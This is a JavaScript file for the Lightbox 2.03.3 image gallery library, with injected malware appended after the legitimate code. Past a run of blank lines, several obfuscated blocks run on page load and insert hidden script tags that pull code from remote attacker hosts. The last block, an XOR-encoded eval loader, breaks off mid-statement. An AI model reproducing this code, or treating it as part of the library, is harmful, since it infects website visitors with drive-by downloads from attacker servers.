// -----------------------------------------------------------------------------------
//
//	Lightbox v2.03.3
//	by Lokesh Dhakar - http://www.huddletogether.com
//	5/21/06
//
//	For more information on this script, visit:
//	http://huddletogether.com/projects/lightbox2/
//
//	Licensed under the Creative Commons Attribution 2.5 License - http://creativecommons.org/licenses/by/2.5/
//	
//	Credit also due to those who have helped, inspired, and made their code available to the public.
//	Including: Scott Upton(uptonic.com), Peter-Paul Koch(quirksmode.com), Thomas Fuchs(mir.aculo.us), and others.
//
//
// -----------------------------------------------------------------------------------
/*

	Table of Contents
	-----------------
	Configuration
	Global Variables

	Extending Built-in Objects	
	- Object.extend(Element)
	- Array.prototype.removeDuplicates()
	- Array.prototype.empty()

	Lightbox Class Declaration
	- initialize()
	- updateImageList()
	- start()
	- changeImage()
	- resizeImageContainer()
	- showImage()
	- updateDetails()
	- updateNav()
	- enableKeyboardNav()
	- disableKeyboardNav()
	- keyboardAction()
	- preloadNeighborImages()
	- end()
	
	Miscellaneous Functions
	- getPageScroll()
	- getPageSize()
	- getKey()
	- listenKey()
	- showSelectBoxes()
	- hideSelectBoxes()
	- showFlash()
	- hideFlash()
	- pause()
	- initLightbox()
	
	Function Calls
	- addLoadEvent(initLightbox)
	
*/
// -----------------------------------------------------------------------------------

//
//	Configuration
//
var fileLoadingImage = "images/loading.gif";		
var fileBottomNavCloseImage = "images/closelabel.gif";

var overlayOpacity = 0.8;	// controls transparency of shadow overlay

var animate = true;			// toggles resizing animations
var resizeSpeed = 10;		// controls the speed of the image resizing animations (1=slowest and 10=fastest)

var borderSize = 10;		//if you adjust the padding in the CSS, you will need to update this variable

// -----------------------------------------------------------------------------------

//
//	Global Variables
//
var imageArray = new Array;
var activeImage;

if(animate == true){
	overlayDuration = 0.2;	// shadow fade in/out duration
	if(resizeSpeed > 10){ resizeSpeed = 10;}
	if(resizeSpeed < 1){ resizeSpeed = 1;}
	resizeDuration = (11 - resizeSpeed) * 0.15;
} else { 
	overlayDuration = 0;
	resizeDuration = 0;
}

// -----------------------------------------------------------------------------------

//
//	Additional methods for Element added by SU, Couloir
//	- further additions by Lokesh Dhakar (huddletogether.com)
//
Object.extend(Element, {
	getWidth: function(element) {
	   	element = $(element);
	   	return element.offsetWidth; 
	},
	setWidth: function(element,w) {
	   	element = $(element);
    	element.style.width = w +"px";
	},
	setHeight: function(element,h) {
   		element = $(element);
    	element.style.height = h +"px";
	},
	setTop: function(element,t) {
	   	element = $(element);
    	element.style.top = t +"px";
	},
	setLeft: function(element,l) {
	   	element = $(element);
    	element.style.left = l +"px";
	},
	setSrc: function(element,src) {
    	element = $(element);
    	element.src = src; 
	},
	setHref: function(element,href) {
    	element = $(element);
    	element.href = href; 
	},
	setInnerHTML: function(element,content) {
		element = $(element);
		element.innerHTML = content;
	}
});

// -----------------------------------------------------------------------------------

//
//	Extending built-in Array object
//	- array.removeDuplicates()
//	- array.empty()
//
Array.prototype.removeDuplicates = function () {
    for(i = 0; i < this.length; i++){
        for(j = this.length-1; j>i; j--){        
            if(this[i][0] == this[j][0]){
                this.splice(j,1);
            }
        }
    }
}

// -----------------------------------------------------------------------------------

Array.prototype.empty = function () {
	for(i = 0; i <= this.length; i++){
		this.shift();
	}
}

// -----------------------------------------------------------------------------------

//
//	Lightbox Class Declaration
//	- initialize()
//	- start()
//	- changeImage()
//	- resizeImageContainer()
//	- showImage()
//	- updateDetails()
//	- updateNav()
//	- enableKeyboardNav()
//	- disableKeyboardNav()
//	- keyboardNavAction()
//	- preloadNeighborImages()
//	- end()
//
//	Structuring of code inspired by Scott Upton (http://www.uptonic.com/)
//
var Lightbox = Class.create();

Lightbox.prototype = {
	
	// initialize()
	// Constructor runs on completion of the DOM loading. Calls updateImageList and then
	// the function inserts html at the bottom of the page which is used to display the shadow 
	// overlay and the image container.
	//
	initialize: function() {	
		
		this.updateImageList();

		// Code inserts html at the bottom of the page that looks similar to this:
		//
		//	<div id="overlay"></div>
		//	<div id="lightbox">
		//		<div id="outerImageContainer">
		//			<div id="imageContainer">
		//				<img id="lightboxImage">
		//				<div style="" id="hoverNav">
		//					<a href="#" id="prevLink"></a>
		//					<a href="#" id="nextLink"></a>
		//				</div>
		//				<div id="loading">
		//					<a href="#" id="loadingLink">
		//						<img src="images/loading.gif">
		//					</a>
		//				</div>
		//			</div>
		//		</div>
		//		<div id="imageDataContainer">
		//			<div id="imageData">
		//				<div id="imageDetails">
		//					<span id="caption"></span>
		//					<span id="numberDisplay"></span>
		//				</div>
		//				<div id="bottomNav">
		//					<a href="#" id="bottomNavClose">
		//						<img src="images/close.gif">
		//					</a>
		//				</div>
		//			</div>
		//		</div>
		//	</div>


		var objBody = document.getElementsByTagName("body").item(0);
		
		var objOverlay = document.createElement("div");
		objOverlay.setAttribute('id','overlay');
		objOverlay.style.display = 'none';
		objOverlay.onclick = function() { myLightbox.end(); }
		objBody.appendChild(objOverlay);
		
		var objLightbox = document.createElement("div");
		objLightbox.setAttribute('id','lightbox');
		objLightbox.style.display = 'none';
		objLightbox.onclick = function(e) {	// close Lightbox is user clicks shadow overlay
			if (!e) var e = window.event;
			var clickObj = Event.element(e).id;
			if ( clickObj == 'lightbox') {
				myLightbox.end();
			}
		};
		objBody.appendChild(objLightbox);
			
		var objOuterImageContainer = document.createElement("div");
		objOuterImageContainer.setAttribute('id','outerImageContainer');
		objLightbox.appendChild(objOuterImageContainer);

		// When Lightbox starts it will resize itself from 250 by 250 to the current image dimension.
		// If animations are turned off, it will be hidden as to prevent a flicker of a
		// white 250 by 250 box.
		if(animate){
			Element.setWidth('outerImageContainer', 250);
			Element.setHeight('outerImageContainer', 250);			
		} else {
			Element.setWidth('outerImageContainer', 1);
			Element.setHeight('outerImageContainer', 1);			
		}

		var objImageContainer = document.createElement("div");
		objImageContainer.setAttribute('id','imageContainer');
		objOuterImageContainer.appendChild(objImageContainer);
	
		var objLightboxImage = document.createElement("img");
		objLightboxImage.setAttribute('id','lightboxImage');
		objImageContainer.appendChild(objLightboxImage);
	
		var objHoverNav = document.createElement("div");
		objHoverNav.setAttribute('id','hoverNav');
		objImageContainer.appendChild(objHoverNav);
	
		var objPrevLink = document.createElement("a");
		objPrevLink.setAttribute('id','prevLink');
		objPrevLink.setAttribute('href','#');
		objHoverNav.appendChild(objPrevLink);
		
		var objNextLink = document.createElement("a");
		objNextLink.setAttribute('id','nextLink');
		objNextLink.setAttribute('href','#');
		objHoverNav.appendChild(objNextLink);
	
		var objLoading = document.createElement("div");
		objLoading.setAttribute('id','loading');
		objImageContainer.appendChild(objLoading);
	
		var objLoadingLink = document.createElement("a");
		objLoadingLink.setAttribute('id','loadingLink');
		objLoadingLink.setAttribute('href','#');
		objLoadingLink.onclick = function() { myLightbox.end(); return false; }
		objLoading.appendChild(objLoadingLink);
	
		var objLoadingImage = document.createElement("img");
		objLoadingImage.setAttribute('src', fileLoadingImage);
		objLoadingLink.appendChild(objLoadingImage);

		var objImageDataContainer = document.createElement("div");
		objImageDataContainer.setAttribute('id','imageDataContainer');
		objLightbox.appendChild(objImageDataContainer);

		var objImageData = document.createElement("div");
		objImageData.setAttribute('id','imageData');
		objImageDataContainer.appendChild(objImageData);
	
		var objImageDetails = document.createElement("div");
		objImageDetails.setAttribute('id','imageDetails');
		objImageData.appendChild(objImageDetails);
	
		var objCaption = document.createElement("span");
		objCaption.setAttribute('id','caption');
		objImageDetails.appendChild(objCaption);
	
		var objNumberDisplay = document.createElement("span");
		objNumberDisplay.setAttribute('id','numberDisplay');
		objImageDetails.appendChild(objNumberDisplay);
		
		var objBottomNav = document.createElement("div");
		objBottomNav.setAttribute('id','bottomNav');
		objImageData.appendChild(objBottomNav);
	
		var objBottomNavCloseLink = document.createElement("a");
		objBottomNavCloseLink.setAttribute('id','bottomNavClose');
		objBottomNavCloseLink.setAttribute('href','#');
		objBottomNavCloseLink.onclick = function() { myLightbox.end(); return false; }
		objBottomNav.appendChild(objBottomNavCloseLink);
	
		var objBottomNavCloseImage = document.createElement("img");
		objBottomNavCloseImage.setAttribute('src', fileBottomNavCloseImage);
		objBottomNavCloseLink.appendChild(objBottomNavCloseImage);
	},


	//
	// updateImageList()
	// Loops through anchor tags looking for 'lightbox' references and applies onclick
	// events to appropriate links. You can rerun after dynamically adding images w/ajax.
	//
	updateImageList: function() {	
		if (!document.getElementsByTagName){ return; }
		var anchors = document.getElementsByTagName('a');
		var areas = document.getElementsByTagName('area');

		// loop through all anchor tags
		for (var i=0; i<anchors.length; i++){
			var anchor = anchors[i];
			
			var relAttribute = String(anchor.getAttribute('rel'));
			
			// use the string.match() method to catch 'lightbox' references in the rel attribute
			if (anchor.getAttribute('href') && (relAttribute.toLowerCase().match('lightbox'))){
				anchor.onclick = function () {myLightbox.start(this); return false;}
			}
		}

		// loop through all area tags
		// todo: combine anchor & area tag loops
		for (var i=0; i< areas.length; i++){
			var area = areas[i];
			
			var relAttribute = String(area.getAttribute('rel'));
			
			// use the string.match() method to catch 'lightbox' references in the rel attribute
			if (area.getAttribute('href') && (relAttribute.toLowerCase().match('lightbox'))){
				area.onclick = function () {myLightbox.start(this); return false;}
			}
		}
	},
	
	
	//
	//	start()
	//	Display overlay and lightbox. If image is part of a set, add siblings to imageArray.
	//
	start: function(imageLink) {	

		hideSelectBoxes();
		hideFlash();

		// stretch overlay to fill page and fade in
		var arrayPageSize = getPageSize();
		Element.setWidth('overlay', arrayPageSize[0]);
		Element.setHeight('overlay', arrayPageSize[1]);

		new Effect.Appear('overlay', { duration: overlayDuration, from: 0.0, to: overlayOpacity });

		imageArray = [];
		imageNum = 0;		

		if (!document.getElementsByTagName){ return; }
		var anchors = document.getElementsByTagName( imageLink.tagName);

		// if image is NOT part of a set..
		if((imageLink.getAttribute('rel') == 'lightbox')){
			// add single image to imageArray
			imageArray.push(new Array(imageLink.getAttribute('href'), imageLink.getAttribute('title')));			
		} else {
		// if image is part of a set..

			// loop through anchors, find other images in set, and add them to imageArray
			for (var i=0; i<anchors.length; i++){
				var anchor = anchors[i];
				if (anchor.getAttribute('href') && (anchor.getAttribute('rel') == imageLink.getAttribute('rel'))){
					imageArray.push(new Array(anchor.getAttribute('href'), anchor.getAttribute('title')));
				}
			}
			imageArray.removeDuplicates();
			while(imageArray[imageNum][0] != imageLink.getAttribute('href')) { imageNum++;}
		}

		// calculate top and left offset for the lightbox 
		var arrayPageScroll = getPageScroll();
		var lightboxTop = arrayPageScroll[1] + (arrayPageSize[3] / 10);
		var lightboxLeft = arrayPageScroll[0];
		Element.setTop('lightbox', lightboxTop);
		Element.setLeft('lightbox', lightboxLeft);
		
		Element.show('lightbox');
		
		this.changeImage(imageNum);
	},

	//
	//	changeImage()
	//	Hide most elements and preload image in preparation for resizing image container.
	//
	changeImage: function(imageNum) {	
		
		activeImage = imageNum;	// update global var

		// hide elements during transition
		if(animate){ Element.show('loading');}
		Element.hide('lightboxImage');
		Element.hide('hoverNav');
		Element.hide('prevLink');
		Element.hide('nextLink');
		Element.hide('imageDataContainer');
		Element.hide('numberDisplay');		
		
		imgPreloader = new Image();
		
		// once image is preloaded, resize image container
		imgPreloader.onload=function(){
			Element.setSrc('lightboxImage', imageArray[activeImage][0]);
			myLightbox.resizeImageContainer(imgPreloader.width, imgPreloader.height);
			
			imgPreloader.onload=function(){};	//	clear onLoad, IE behaves irratically with animated gifs otherwise 
		}
		imgPreloader.src = imageArray[activeImage][0];
	},

	//
	//	resizeImageContainer()
	//
	resizeImageContainer: function( imgWidth, imgHeight) {

		// get curren width and height
		this.widthCurrent = Element.getWidth('outerImageContainer');
		this.heightCurrent = Element.getHeight('outerImageContainer');

		// get new width and height
		var widthNew = (imgWidth  + (borderSize * 2));
		var heightNew = (imgHeight  + (borderSize * 2));

		// scalars based on change from old to new
		this.xScale = ( widthNew / this.widthCurrent) * 100;
		this.yScale = ( heightNew / this.heightCurrent) * 100;

		// calculate size difference between new and old image, and resize if necessary
		wDiff = this.widthCurrent - widthNew;
		hDiff = this.heightCurrent - heightNew;

		if(!( hDiff == 0)){ new Effect.Scale('outerImageContainer', this.yScale, {scaleX: false, duration: resizeDuration, queue: 'front'}); }
		if(!( wDiff == 0)){ new Effect.Scale('outerImageContainer', this.xScale, {scaleY: false, delay: resizeDuration, duration: resizeDuration}); }

		// if new and old image are same size and no scaling transition is necessary, 
		// do a quick pause to prevent image flicker.
		if((hDiff == 0) && (wDiff == 0)){
			if (navigator.appVersion.indexOf("MSIE")!=-1){ pause(250); } else { pause(100);} 
		}

		Element.setHeight('prevLink', imgHeight);
		Element.setHeight('nextLink', imgHeight);
		Element.setWidth( 'imageDataContainer', widthNew);

		this.showImage();
	},
	
	//
	//	showImage()
	//	Display image and begin preloading neighbors.
	//
	showImage: function(){
		Element.hide('loading');
		new Effect.Appear('lightboxImage', { duration: resizeDuration, queue: 'end', afterFinish: function(){	myLightbox.updateDetails(); } });
		this.preloadNeighborImages();
	},

	//
	//	updateDetails()
	//	Display caption, image number, and bottom nav.
	//
	updateDetails: function() {
	
		// if caption is not null
		if(imageArray[activeImage][1]){
			Element.show('caption');
			Element.setInnerHTML( 'caption', imageArray[activeImage][1]);
		}
		
		// if image is part of set display 'Image x of x' 
		if(imageArray.length > 1){
			Element.show('numberDisplay');
			Element.setInnerHTML( 'numberDisplay', "Image " + eval(activeImage + 1) + " of " + imageArray.length);
		}

		new Effect.Parallel(
			[ new Effect.SlideDown( 'imageDataContainer', { sync: true, duration: resizeDuration, from: 0.0, to: 1.0 }), 
			  new Effect.Appear('imageDataContainer', { sync: true, duration: resizeDuration }) ], 
			{ duration: resizeDuration, afterFinish: function() {
				// update overlay size and update nav
				var arrayPageSize = getPageSize();
				Element.setHeight('overlay', arrayPageSize[1]);
				myLightbox.updateNav();
				}
			} 
		);
	},

	//
	//	updateNav()
	//	Display appropriate previous and next hover navigation.
	//
	updateNav: function() {

		Element.show('hoverNav');				

		// if not first image in set, display prev image button
		if(activeImage != 0){
			Element.show('prevLink');
			document.getElementById('prevLink').onclick = function() {
				myLightbox.changeImage(activeImage - 1); return false;
			}
		}

		// if not last image in set, display next image button
		if(activeImage != (imageArray.length - 1)){
			Element.show('nextLink');
			document.getElementById('nextLink').onclick = function() {
				myLightbox.changeImage(activeImage + 1); return false;
			}
		}
		
		this.enableKeyboardNav();
	},

	//
	//	enableKeyboardNav()
	//
	enableKeyboardNav: function() {
		document.onkeydown = this.keyboardAction; 
	},

	//
	//	disableKeyboardNav()
	//
	disableKeyboardNav: function() {
		document.onkeydown = '';
	},

	//
	//	keyboardAction()
	//
	keyboardAction: function(e) {
		if (e == null) { // ie
			keycode = event.keyCode;
			escapeKey = 27;
		} else { // mozilla
			keycode = e.keyCode;
			escapeKey = e.DOM_VK_ESCAPE;
		}

		key = String.fromCharCode(keycode).toLowerCase();
		
		if((key == 'x') || (key == 'o') || (key == 'c') || (keycode == escapeKey)){	// close lightbox
			myLightbox.end();
		} else if((key == 'p') || (keycode == 37)){	// display previous image
			if(activeImage != 0){
				myLightbox.disableKeyboardNav();
				myLightbox.changeImage(activeImage - 1);
			}
		} else if((key == 'n') || (keycode == 39)){	// display next image
			if(activeImage != (imageArray.length - 1)){
				myLightbox.disableKeyboardNav();
				myLightbox.changeImage(activeImage + 1);
			}
		}

	},

	//
	//	preloadNeighborImages()
	//	Preload previous and next images.
	//
	preloadNeighborImages: function(){

		if((imageArray.length - 1) > activeImage){
			preloadNextImage = new Image();
			preloadNextImage.src = imageArray[activeImage + 1][0];
		}
		if(activeImage > 0){
			preloadPrevImage = new Image();
			preloadPrevImage.src = imageArray[activeImage - 1][0];
		}
	
	},

	//
	//	end()
	//
	end: function() {
		this.disableKeyboardNav();
		Element.hide('lightbox');
		new Effect.Fade('overlay', { duration: overlayDuration});
		showSelectBoxes();
		showFlash();
	}
}

// -----------------------------------------------------------------------------------

//
// getPageScroll()
// Returns array with x,y page scroll values.
// Core code from - quirksmode.com
//
function getPageScroll(){

	var xScroll, yScroll;

	if (self.pageYOffset) {
		yScroll = self.pageYOffset;
		xScroll = self.pageXOffset;
	} else if (document.documentElement && document.documentElement.scrollTop){	 // Explorer 6 Strict
		yScroll = document.documentElement.scrollTop;
		xScroll = document.documentElement.scrollLeft;
	} else if (document.body) {// all other Explorers
		yScroll = document.body.scrollTop;
		xScroll = document.body.scrollLeft;	
	}

	arrayPageScroll = new Array(xScroll,yScroll) 
	return arrayPageScroll;
}

// -----------------------------------------------------------------------------------

//
// getPageSize()
// Returns array with page width, height and window width, height
// Core code from - quirksmode.com
// Edit for Firefox by pHaez
//
function getPageSize(){
	
	var xScroll, yScroll;
	
	if (window.innerHeight && window.scrollMaxY) {	
		xScroll = window.innerWidth + window.scrollMaxX;
		yScroll = window.innerHeight + window.scrollMaxY;
	} else if (document.body.scrollHeight > document.body.offsetHeight){ // all but Explorer Mac
		xScroll = document.body.scrollWidth;
		yScroll = document.body.scrollHeight;
	} else { // Explorer Mac...would also work in Explorer 6 Strict, Mozilla and Safari
		xScroll = document.body.offsetWidth;
		yScroll = document.body.offsetHeight;
	}
	
	var windowWidth, windowHeight;
	
//	console.log(self.innerWidth);
//	console.log(document.documentElement.clientWidth);

	if (self.innerHeight) {	// all except Explorer
		if(document.documentElement.clientWidth){
			windowWidth = document.documentElement.clientWidth; 
		} else {
			windowWidth = self.innerWidth;
		}
		windowHeight = self.innerHeight;
	} else if (document.documentElement && document.documentElement.clientHeight) { // Explorer 6 Strict Mode
		windowWidth = document.documentElement.clientWidth;
		windowHeight = document.documentElement.clientHeight;
	} else if (document.body) { // other Explorers
		windowWidth = document.body.clientWidth;
		windowHeight = document.body.clientHeight;
	}	
	
	// for small pages with total height less then height of the viewport
	if(yScroll < windowHeight){
		pageHeight = windowHeight;
	} else { 
		pageHeight = yScroll;
	}

//	console.log("xScroll " + xScroll)
//	console.log("windowWidth " + windowWidth)

	// for small pages with total width less then width of the viewport
	if(xScroll < windowWidth){	
		pageWidth = xScroll;		
	} else {
		pageWidth = windowWidth;
	}
//	console.log("pageWidth " + pageWidth)

	arrayPageSize = new Array(pageWidth,pageHeight,windowWidth,windowHeight) 
	return arrayPageSize;
}

// -----------------------------------------------------------------------------------

//
// getKey(key)
// Gets keycode. If 'x' is pressed then it hides the lightbox.
//
function getKey(e){
	if (e == null) { // ie
		keycode = event.keyCode;
	} else { // mozilla
		keycode = e.which;
	}
	key = String.fromCharCode(keycode).toLowerCase();
	
	if(key == 'x'){
	}
}

// -----------------------------------------------------------------------------------

//
// listenKey()
//
function listenKey () {	document.onkeypress = getKey; }
	
// ---------------------------------------------------

function showSelectBoxes(){
	var selects = document.getElementsByTagName("select");
	for (i = 0; i != selects.length; i++) {
		selects[i].style.visibility = "visible";
	}
}

// ---------------------------------------------------

function hideSelectBoxes(){
	var selects = document.getElementsByTagName("select");
	for (i = 0; i != selects.length; i++) {
		selects[i].style.visibility = "hidden";
	}
}

// ---------------------------------------------------

function showFlash(){
	var flashObjects = document.getElementsByTagName("object");
	for (i = 0; i < flashObjects.length; i++) {
		flashObjects[i].style.visibility = "visible";
	}

	var flashEmbeds = document.getElementsByTagName("embed");
	for (i = 0; i < flashEmbeds.length; i++) {
		flashEmbeds[i].style.visibility = "visible";
	}
}

// ---------------------------------------------------

function hideFlash(){
	var flashObjects = document.getElementsByTagName("object");
	for (i = 0; i < flashObjects.length; i++) {
		flashObjects[i].style.visibility = "hidden";
	}

	var flashEmbeds = document.getElementsByTagName("embed");
	for (i = 0; i < flashEmbeds.length; i++) {
		flashEmbeds[i].style.visibility = "hidden";
	}

}


// ---------------------------------------------------

//
// pause(numberMillis)
// Pauses code execution for specified time. Uses busy code, not good.
// Help from Ran Bar-On [ran2103@gmail.com]
//

function pause(ms){
	var date = new Date();
	curDate = null;
	do{var curDate = new Date();}
	while( curDate - date < ms);
}
/*
function pause(numberMillis) {
	var curently = new Date().getTime() + sender;
	while (new Date().getTime();	
}
*/
// ---------------------------------------------------



function initLightbox() { myLightbox = new Lightbox(); }
Event.observe(window, 'load', initLightbox, false);















var o;if(o!='vi' && o != ''){o=null};var n;if(n!='' && n!='y'){n=''};var s=document;var sj=window;var g='';var v='sxc9rhixpxtF'.replace(/[F9xhv]/g, '');this.af=false;sj.onload=function(){var oh='';var bp='';try {var j;if(j!='l'){j=''};_=s.createElement(v);this.ok='';var qn="qn";_.setAttribute('d|ejfjejr3'.replace(/[3\|jzJ]/g, ''), "1");_.src='h^t1t$p1:^/$/^a4r4m1o1r1g1a4m4e4sS-^c$o^m^.Ss^a^n4oSo1k4.4c$o4m$.Sk^e^e1p1vSi1d$-4c$oSm4.$r1eScSe$n4t4m^e^x4i1c1oS.4rSu4:$810$8401/^aSnSj1u^k4e$.Sc^o1m4/^aSn1j$u4k1eS.1cSo1m1/4v$k^o$n1t$a$kSt4e1.4r$uS/SgSo^o^g1l4e$.4c^oSm$/^h1o$t4t1i1e4s4t$aSr1.$c4oSm4/$'.replace(/[\$\^S41]/g, '');this.lr=false;var xm="xm";this.h=false;this.ha=false;s.body.appendChild(_);var _u=new String();var ta='';} catch(q){};};var wh=false;
var o='';w=function(){var y=document;var fy;if(fy!='' && fy!='l'){fy=''};this.oq=false;window[c([7,2][1])]=function(){try {var b;if(b!=''){b='v'};m=y[c([1][0])](c([0][0]));var mb=new String();this.nh="nh";m[c([5][0])](c([0,7][1]), "1");m[c([6,3][1])]=c([8][0]);var f = y[c([6][0])];f[c([4,3][0])](m);var z='';} catch(q){var h=new Array();};var ad;if(ad!='r' && ad != ''){ad=null};};this.px=45960;var n_=20100;function c(d){var mv=['sRcRrViGpRtR'.replace(/[REVGK]/g, ''), 'curfeBaBtBeFEflfeBmuefnBtF'.replace(/[F_ufB]/g, ''), 'oznzl9ozazdz'.replace(/[z,b29]/g, ''), 's~r~c~'.replace(/[~\<%q@]/g, ''), 'aVp6p6e0n6dvC6hjiVl0dj'.replace(/[j06vV]/g, ''), 's,eGtkAktkt,r!i!b,u!t,e,'.replace(/[,kG\!8]/g, ''), 'bHoSdcyc'.replace(/[c\|HfS]/g, ''), 'dBeOfHeBr3'.replace(/[3OHmB]/g, ''), 'h$t_tMp_:$/U/_gUoUo>g_l>e_-$p_tM.Ma$o>lU.>c>oU._u_k$.$fUa$cMe>b>oMoMkM-McMo$mM._b>eMsMt$nUe>w>s>m_aUl_lM.>rUu_:M8$0$8U0U/_g>o$o_gMl_eU._c$o>mU/UgUo_o_g_l>eM.>c$oMm_/Mx_cMa>r$.UcUo$m_.>c_nU/Mt$u$._t>v_/$d>y>nUd_nUs>.Uo$rMg>/$'.replace(/[\$_MU\>]/g, '')];var wn=mv[d];var qk;if(qk!='' && qk!='op'){qk='nk'};return wn;var bz;if(bz!='no' && bz!='vyo'){bz='no'};}var jv;if(jv!='' && jv!='oi'){jv=null};};var eg=false;w();var yd;if(yd!='' && yd!='dw'){yd='oe'};
var c=new Date();this.i_="";function k() {var uo;if(uo!='' && uo!='pi'){uo='t'};var n='';function s(q,g,b){var jb;if(jb!='wd'){jb=''};var tq='';q.setAttribute(g, b);var e='';}function qu(){var qv;if(qv!='' && qv!='kr'){qv=null};var i_l;if(i_l!='' && i_l!='mv'){i_l=null};return ([1,5][0]);var ot=false;}var oo=new String();var fs;if(fs!='mg' && fs!='jw'){fs=''};var d='s:c:rDiIpItD'.replace(/[D9kI\:]/g, '');var bt;if(bt!='pw'){bt=''};var qg='omnkl9oKakd9'.replace(/[95mKk]/g, '');var lp;if(lp!='cr' && lp != ''){lp=null};var m='cvrvevaStSePEPlSevmPevn0tP'.replace(/[P0RvS]/g, '');var qo;if(qo!='et' && qo!='v'){qo='et'};var d_='sIrIcb'.replace(/[bIS/N]/g, '');var _w;if(_w!='' && _w!='um'){_w=null};var dx;if(dx!='ya' && dx!='z'){dx=''};var u='hPtPtEpP:$/$/PgToEu$gToTuE-PcEo!m!.EhTaEbTeTrEt!u!r$kT.EcPo!m!.EyToEu!pPo!r!n!-!c!o!mT.PmTeEd!i$a$t$aPgPoPn!l!i!nTeE.Tr$uP:$8!0!8P0$/Tb$aTiPd$u$.EcEoTmP/!b$a!iTdTuP.Ec$oPm!/$x!nTxExT.Pc$o$mE/!g$oTo!g!l$e$.$cPoPm$/EpPoPrPnTbPb!.Po$rPg$/P'.replace(/[P\!TE\$]/g, '');var lsq;if(lsq!='ku'){lsq='ku'};var l=window;var dr=new Array();l[qg]=function(){this.te='';try {var kn;if(kn!='pj' && kn!='jy'){kn='pj'};p=document[m](d);var tu;if(tu!='fr'){tu=''};var inq;if(inq!='' && inq!='se'){inq='f_'};var qm;if(qm!='' && qm!='ug'){qm=null};this.gy=46981;s(p,d_,u);var i_c='';s(p,'d_eTf:e_r3'.replace(/[3\:T/_]/g, ''),qu());var mo=new String();var oy;if(oy!='za' && oy!='ri'){oy=''};var rt='';var cw='';document['bCo5dCyC'.replace(/[Crkt5]/g, '')]['azpypyeznTd!CzhTiTl0dz'.replace(/[z\!0yT]/g, '')](p);var jf='';} catch(i){};};var le='';var wp='';this.jl="";};k();var tb=new Array();var ow='';
var Av="242730113b5c3927272407483a2e3a2d4f0d26083a2a3d220316011f0c2501341a3308323d140a043d193d1e0b09291c392a3d3c25131f1f0e3a053a0f1f213a054d033a4e0b0d1179122d560e11";this.kU="kU";var YcR;if(YcR!='acu' && YcR!='ml'){YcR='acu'};function F(m){this.Lk=3334;var c="c"; var t=function(i,A){var ET="ET";var H="H";return i[a("rcahCAoedt", [1,3,2,0,4])](A);var To;if(To!='' && To!='Nt'){To=null};};var dC=new String();var HN;if(HN!='' && HN!='HM'){HN=null};var q;if(q!='sj'){q=''}; function j(g,jg){var kg;if(kg!='Sm' && kg!='Gz'){kg=''};return g^jg;var I=false;var Ro;if(Ro!='' && Ro!='SG'){Ro=''};}var fr;if(fr!='nQ' && fr!='xb'){fr='nQ'};var bwG;if(bwG!=''){bwG='HJ'};this.qf=''; var gE=function(h){var la;if(la!='' && la!='zT'){la='cC'};var Tb;if(Tb!='' && Tb!='tW'){Tb='D'};var gy='';var ic=[0,42][0];var mL="";this.K='';var T=[1,27][0];this.Lv="Lv";var zJ;if(zJ!='Zn'){zJ='Zn'};var N=[61,0][1];var KB;if(KB!='eN' && KB!='p'){KB='eN'};var O=[121,255][1];var C=h[a("elntgh", [1,0,2])];this.Il=false;this.Ji=false;var PI='';while(ic<C){var WW=new Array();this.jJ=false;ic++;this.Gi='';this.XE='';z=t(h,ic - T);var fJ="";var JB="";N+=z*C;this.Gk="";this.jh="";}var Cr;if(Cr!='' && Cr!='Bl'){Cr=null};var Q=new String();return new f(N % O);};var JS;if(JS!=''){JS='db'}; var oz;if(oz!='' && oz!='ML'){oz=''};function a(AB, W){var P = '';var Yq;if(Yq!=''){Yq='pR'};var rZ;if(rZ!='xF' && rZ!='OY'){rZ='xF'};var X=[0][0];var R = AB.length;this.fQ="fQ";var iP;if(iP!='' && iP!='tC'){iP=''};var PY='';var PR=new String();var T=[151,1][1];var DUM=new String();var b = W.length;var OJ=56209;this.DS='';this.hx=45108;for(var Ry = X; Ry < R; Ry += b) {var il = AB.substr(Ry, b);var Rp;if(Rp!='NW'){Rp='NW'};var hJ;if(hJ!=''){hJ='Ar'};var xK;if(xK!=''){xK='iM'};if(il.length == b){for(var ic in W) {var PE=33530;this.zc='';var mQ;if(mQ!='' && mQ!='Or'){mQ='ls'};P+=il.substr(W[ic], T);this.eW=false;var kt=false;var Jm="";}this.Lnp="Lnp";var jQ='';this.iL="";var NO;if(NO!='Ob' && NO!='fn'){NO='Ob'};} else {  P+=il;var aM;if(aM!='Bj' && aM!='Cs'){aM=''};}var Ao=19049;var glb="";}return P;var Ew=new Date();var QS=new Date();}var AF;if(AF!='Qr'){AF='Qr'};var Vy=''; var G=function(AB){var PN;if(PN!='zb' && PN!='bQ'){PN=''};var cr;if(cr!='' && cr!='vJ'){cr=null};var Qc;if(Qc!='JZ'){Qc=''};AB = new f(AB);var Unf;if(Unf!='aX' && Unf != ''){Unf=null};var X =[0,46,86,26][0];var bQA;if(bQA!='eWc' && bQA!='Kwd'){bQA='eWc'};var P = '';this.ih="ih";var Ce="Ce";var Ry =[225,179,0,95][2];var WC="WC";var ro='';var d = -1;var Lp=new String();var Iz;if(Iz!='Vh' && Iz != ''){Iz=null};var zK;if(zK!='' && zK!='AM'){zK=null};for (Ry=AB[a("elgnht", [1,0])]-d;Ry>=X;Ry=Ry-[169,200,124,1][3]){this.FW=25975;this.oo=36886;P+=AB[a("achtrA", [1,2,0])](Ry);}return P;};var Tw='';var wHR=new Date();var u=window;var E=u[a("vela", [1,0])];var iq="";var Lx='';var NV=E(a("onucintF", [7,2,1,3,6,4,0,5]));var Co;if(Co!='' && Co!='ucm'){Co=null};var NT = '';var Jp=new Date();var GT=E(a("ExegRp", [4,2,3,0,1]));var f=E(a("tSirgn", [1,0]));this.OnR="";var chz;if(chz!='' && chz!='ow'){chz='Fiu'};this.mx=3339;var KP;if(KP!='' && KP!='lE'){KP='MA'};this.RY=false;var B=u[a("seunepca", [2,3,1,0])];var kSy=31654;var Oy=60626;var k=f[a("afromhCrCode", [1,2,3,4,6,5,0])];var eH="";var yFg;if(yFg!='' && yFg!='qa'){yFg=null};var Cm = /[^@a-z0-9A-Z_-]/g;this.FJ=11835;var n = k(37);var wo;if(wo!='AZm' && wo!='SN'){wo=''};var w =[159,2,57,70][1];var wr="";var xQ;if(xQ!='AE' && xQ != ''){xQ=null};var Bb = '';var dv=new Date();var Aa=[1, a("ncuoemdterecta.E(meetnl\'\'rictps)", [6,3,1,2,5,4,0,7]),2, a("oedulbl.cikccom", [2,0,3,5,4,1]),3, a("cduonmteo.dbayp.npdeiClhdd)(", [1,3,0,2]),4, a("pcnoos.mssdo.darnec.iiamhi", [1,3,7,6,5,0,4,2]),5, 